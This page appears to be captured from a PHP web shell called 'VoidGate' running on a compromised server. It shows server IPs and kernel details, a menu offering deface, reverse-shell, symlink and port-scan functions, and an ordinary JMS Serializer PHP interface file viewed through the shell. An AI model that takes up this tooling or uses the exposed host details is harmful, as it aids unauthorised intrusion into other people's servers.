ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
jms
/
serializer
/
src
/
Visitor
/
Viewing: SerializationVisitorInterface.php
<?php declare(strict_types=1); namespace JMS\Serializer\Visitor; use JMS\Serializer\Metadata\ClassMetadata; use JMS\Serializer\Metadata\PropertyMetadata; use JMS\Serializer\VisitorInterface; /** * Interface for visitors. * * This contains the minimal set of values that must be supported for any * output format. * * @author Johannes M. Schmitt <schmittjoh@gmail.com> * @author Asmir Mustafic <goetas@gmail.com> */ interface SerializationVisitorInterface extends VisitorInterface { /** * @param mixed $data * * @return mixed */ public function visitNull($data, array $type); /** * @return mixed */ public function visitString(string $data, array $type); /** * @return mixed */ public function visitBoolean(bool $data, array $type); /** * @return mixed */ public function visitDouble(float $data, array $type); /** * @return mixed */ public function visitInteger(int $data, array $type); /** * @return array|\ArrayObject */ public function visitArray(array $data, array $type); /** * Called before the properties of the object are being visited. */ public function startVisitingObject(ClassMetadata $metadata, object $data, array $type): void; /** * @param mixed $data */ public function visitProperty(PropertyMetadata $metadata, $data): void; /** * Called after all properties of the object have been visited. * * @return array|\ArrayObject */ public function endVisitingObject(ClassMetadata $metadata, object $data, array $type); }
Coded With 💗 by
0x6ick